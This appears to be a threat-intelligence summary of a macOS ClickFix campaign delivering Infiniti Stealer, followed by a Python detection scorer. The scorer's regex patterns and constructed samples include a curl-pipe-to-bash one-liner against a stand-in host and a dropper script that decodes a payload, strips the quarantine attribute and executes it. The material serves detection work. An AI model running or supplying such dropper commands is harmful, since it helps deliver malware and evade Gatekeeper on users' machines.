Malwarebytes reports a macOS-targeted ClickFix campaign that lures victims to paste and run a Cloudflare-themed Terminal command which downloads a Bash script that deploys a Nuitka-compiled loader and the Infiniti Stealer information stealer. The Python-based stealer harvests browser credentials, Keychain items, crypto wallets, developer secrets and screenshots, exfiltrates data to a C2 via HTTP, and notifies operators via Telegram. #InfinitiStealer #ClickFix
Keypoints
- The attack uses a fake Cloudflare verification page to trick macOS users into pasting and executing Terminal commands.
- Executing the pasted command fetches a Bash script that decodes an embedded payload, writes a second-stage binary to a temporary folder, strips the com.apple.quarantine extended attribute (so Gatekeeper does not inspect the file at launch), and runs it.
- The dropped binary is a Nuitka-compiled loader that decompresses embedded data and launches the Infiniti Stealer payload.
- Infiniti Stealer targets browser credentials, Keychain data, cryptocurrency wallets, developer secrets, and screenshots, then exfiltrates data via HTTP and sends notifications to Telegram.
- Evasion techniques include randomized execution delays, sandbox/analysis checks, and compiling the Python stealer into a native binary with Nuitka to hinder static analysis; the campaign shows ClickFix tactics moving from Windows to macOS.
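The chain in the keypoints above (fetch-and-pipe to a shell, decode an embedded payload, drop a binary under a temporary directory, strip the quarantine attribute, execute, with a randomized sleep) is easy to score heuristically in shell history, EDR command-line telemetry, or a script body pulled from a suspicious URL. The scorer below is an added example, not code from Malwarebytes, SecurityWeek, or the campaign; the indicator names, weights, verdict thresholds, and every sample command are constructed for illustration and are not the campaign's real commands or IOCs.

```python
"""Heuristic scorer for ClickFix-style macOS Terminal one-liners and the
scripts they fetch.

Added example, not code from the Malwarebytes or SecurityWeek writeups.
Indicator names, weights, thresholds and all sample commands are assumptions
constructed for illustration; they are not the campaign's real commands.
"""
import re

# (regex, weight) -- the weights are an assumption; tune them to your telemetry
INDICATORS = {
    "fetch_pipe_shell": (r"\b(curl|wget)\b[^\n|]*\|\s*(sudo\s+)?(ba|z)?sh\b", 3),
    "decode_payload":   (r"\bbase64\s+(-d|-D|--decode)\b", 2),
    "temp_dir_write":   (r">\s*(/tmp/|\$TMPDIR|\$\{TMPDIR\}|/private/var/folders/)", 2),
    # xattr -d com.apple.quarantine, or xattr -c which clears every attribute
    "strip_quarantine": (r"\bxattr\b[^\n]*?(com\.apple\.quarantine|\s-c\b)", 3),
    "chmod_exec":       (r"\bchmod\s+(\+x|[0-7]{3,4})\b", 1),
    # a command token that starts with a temp path, i.e. running the dropped file
    "exec_from_temp":   (r"(^|[;&|]\s*)(/tmp/|\$TMPDIR/|\$\{TMPDIR\}/|/private/var/folders/)\S+", 2),
    "random_delay":     (r"\bsleep\b[^\n;|&]*RANDOM", 1),
}


def score_command(text: str) -> dict:
    """Return matched indicator names, their summed weight, and a verdict."""
    hits = [name for name, (pattern, _) in INDICATORS.items()
            if re.search(pattern, text, re.MULTILINE)]
    total = sum(INDICATORS[name][1] for name in hits)
    if total >= 6:
        verdict = "high"     # decode + drop + dequarantine + run: treat as a ClickFix chain
    elif total >= 3:
        verdict = "medium"   # one strong indicator on its own, e.g. curl | bash
    else:
        verdict = "low"
    return {"hits": hits, "score": total, "verdict": verdict}


# Constructed samples (NOT the real campaign commands or URLs).
SAMPLE_ONELINER = (
    'echo "Cloudflare Ray ID: 8a1b2c3d4e5f" ; '
    "curl -fsSL https://verify.example.invalid/cf.sh | bash"
)

SAMPLE_STAGE2 = """#!/bin/bash
sleep $((RANDOM % 5))
mkdir -p /tmp/.cache
echo "$PAYLOAD" | base64 -d > /tmp/.cache/helper
chmod +x /tmp/.cache/helper
xattr -d com.apple.quarantine /tmp/.cache/helper
/tmp/.cache/helper &
"""

SAMPLE_BENIGN = "brew update && brew upgrade wget"

if __name__ == "__main__":
    for label, sample in [("one-liner", SAMPLE_ONELINER),
                          ("stage2", SAMPLE_STAGE2),
                          ("benign", SAMPLE_BENIGN)]:
        print(f"{label:9s} {score_command(sample)}")
```

The pasted one-liner alone only trips the curl-pipe-shell indicator, which is why it scores medium; the downloaded stage, where the decode, drop, dequarantine and execute steps all sit together, is what pushes the verdict to high. A standalone `xattr -d com.apple.quarantine` on a file in Downloads is common developer behaviour, so the weights deliberately keep it below the high threshold unless it appears with a temp-directory drop or execution.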
Read More: https://www.securityweek.com/cloudflare-themed-clickfix-attack-drops-infiniti-stealer-on-macs/